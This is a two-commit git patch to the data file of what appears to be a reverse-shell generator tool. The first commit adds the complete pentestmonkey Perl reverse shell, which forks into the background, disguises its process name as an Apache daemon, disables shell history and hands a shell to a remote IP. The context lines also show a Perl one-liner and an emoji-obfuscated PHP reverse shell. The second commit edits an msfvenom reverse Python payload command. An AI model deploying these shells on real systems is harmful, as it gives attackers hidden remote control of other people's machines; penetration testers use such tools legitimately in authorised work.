From 63978e4b9e7706f9be2399dee3d0cbea1b6c2c9b Mon Sep 17 00:00:00 2001 From: Alvin Smith Date: Tue, 11 Oct 2022 12:30:34 +1300 Subject: [PATCH 1/2] Update data.js with new Perl PentestMonkey Add Perl PentestMonkey --- js/data.js | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/js/data.js b/js/data.js index dd8a197..817c7ff 100644 --- a/js/data.js +++ b/js/data.js @@ -120,6 +120,11 @@ const reverseShellCommands = withCommandType( "command": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{ip}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'", "meta": ["linux", "mac"] }, + { + "name": "Perl PentestMonkey", + "command": `#!/usr/bin/perl -w\n# perl-reverse-shell - A Reverse Shell implementation in PERL\n# Copyright (C) 2006 pentestmonkey@pentestmonkey.net\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. The author accepts no liability\n# for damage caused by this tool. If these terms are not acceptable to you, then\n# do not use this tool.\n#\n# In all other respects the GPL version 2 applies:\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. If these terms are not acceptable to\n# you, then do not use this tool.\n#\n# You are encouraged to send comments, improvements or suggestions to\n# me at pentestmonkey@pentestmonkey.net\n#\n# Description\n# -----------\n# This script will make an outbound TCP connection to a hardcoded IP and port.\n# The recipient will be given a shell running as the current user (apache normally).\n#\n\nuse strict;\nuse Socket;\nuse FileHandle;\nuse POSIX;\nmy $VERSION = "1.0";\n\n# Where to send the reverse shell. Change these.\nmy $ip = '{ip}';\nmy $port = {port};\n\n# Options\nmy $daemon = 1;\nmy $auth = 0; # 0 means authentication is disabled and any \n # source IP can access the reverse shell\nmy $authorised_client_pattern = qr(^127\\.0\\.0\\.1$);\n\n# Declarations\nmy $global_page = "";\nmy $fake_process_name = "/usr/sbin/apache";\n\n# Change the process name to be less conspicious\n$0 = "[httpd]";\n\n# Authenticate based on source IP address if required\nif (defined($ENV{'REMOTE_ADDR'})) {\n cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");\n\n if ($auth) {\n unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {\n cgiprint("ERROR: Your client isn't authorised to view this page");\n cgiexit();\n }\n }\n} elsif ($auth) {\n cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");\n cgiexit(0);\n}\n\n# Background and dissociate from parent process if required\nif ($daemon) {\n my $pid = fork();\n if ($pid) {\n cgiexit(0); # parent exits\n }\n\n setsid();\n chdir('/');\n umask(0);\n}\n\n# Make TCP connection for reverse shell\nsocket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));\nif (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {\n cgiprint("Sent reverse shell to $ip:$port");\n cgiprintpage();\n} else {\n cgiprint("Couldn't open reverse shell to $ip:$port: $!");\n cgiexit(); \n}\n\n# Redirect STDIN, STDOUT and STDERR to the TCP connection\nopen(STDIN, ">&SOCK");\nopen(STDOUT,">&SOCK");\nopen(STDERR,">&SOCK");\n$ENV{'HISTFILE'} = '/dev/null';\nsystem("w;uname -a;id;pwd");\nexec({"{shell}"} ($fake_process_name, "-i"));\n\n# Wrapper around print\nsub cgiprint {\n my $line = shift;\n $line .= "

\\n";\n $global_page .= $line;\n}\n\n# Wrapper around exit\nsub cgiexit {\n cgiprintpage();\n exit 0; # 0 to ensure we don't give a 500 response.\n}\n\n# Form HTTP response using all the messages gathered by cgiprint so far\nsub cgiprintpage {\n print "Content-Length: " . length($global_page) . "\\r\nConnection: close\\r\nContent-Type: text\\/html\\r\\n\\r\\n" . $global_page;\n}\n`, + "meta": ["linux", "mac"] + }, { "name": "PHP Emoji", "command": "php -r '$๐Ÿ˜€=\"1\";$๐Ÿ˜=\"2\";$๐Ÿ˜…=\"3\";$๐Ÿ˜†=\"4\";$๐Ÿ˜‰=\"5\";$๐Ÿ˜Š=\"6\";$๐Ÿ˜Ž=\"7\";$๐Ÿ˜=\"8\";$๐Ÿ˜š=\"9\";$๐Ÿ™‚=\"0\";$๐Ÿคข=\" \";$๐Ÿค“=\"<\";$๐Ÿค =\">\";$๐Ÿ˜ฑ=\"-\";$๐Ÿ˜ต=\"&\";$๐Ÿคฉ=\"i\";$๐Ÿค”=\".\";$๐Ÿคจ=\"/\";$๐Ÿฅฐ=\"a\";$๐Ÿ˜=\"b\";$๐Ÿ˜ถ=\"i\";$๐Ÿ™„=\"h\";$๐Ÿ˜‚=\"c\";$๐Ÿคฃ=\"d\";$๐Ÿ˜ƒ=\"e\";$๐Ÿ˜„=\"f\";$๐Ÿ˜‹=\"k\";$๐Ÿ˜˜=\"n\";$๐Ÿ˜—=\"o\";$๐Ÿ˜™=\"p\";$๐Ÿค—=\"s\";$๐Ÿ˜‘=\"x\";$๐Ÿ’€ = $๐Ÿ˜„. $๐Ÿค—. $๐Ÿ˜—. $๐Ÿ˜‚. $๐Ÿ˜‹. $๐Ÿ˜—. $๐Ÿ˜™. $๐Ÿ˜ƒ. $๐Ÿ˜˜;$๐Ÿš€ = \"{ip}\";$๐Ÿ’ป = {port};$๐Ÿš = \"{shell}\". $๐Ÿคข. $๐Ÿ˜ฑ. $๐Ÿคฉ. $๐Ÿคข. $๐Ÿค“. $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿ˜. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…;$๐Ÿคฃ = $๐Ÿ’€($๐Ÿš€,$๐Ÿ’ป);$๐Ÿ‘ฝ = $๐Ÿ˜ƒ. $๐Ÿ˜‘. $๐Ÿ˜ƒ. $๐Ÿ˜‚;$๐Ÿ‘ฝ($๐Ÿš);'", From 7b86264ecdc835a1f65d699525a34cdcb6a35af4 Mon Sep 17 00:00:00 2001 From: Alvin Smith Date: Tue, 11 Oct 2022 13:01:00 +1300 Subject: [PATCH 2/2] Update data.js Fix the Python Stageless Reverse TCP output file extension error https://github.com/0dayCTF/reverse-shell-generator/issues/96 --- js/data.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/js/data.js b/js/data.js index 817c7ff..a9cbe52 100644 --- a/js/data.js +++ b/js/data.js @@ -440,7 +440,7 @@ const msfvenomCommands = withCommandType( }, { "name": "Python Stageless Reverse TCP", - "command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw -o shell.py", + "command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw", "meta": ["msfvenom", "windows", "linux", "stageless", "reverse"] }, {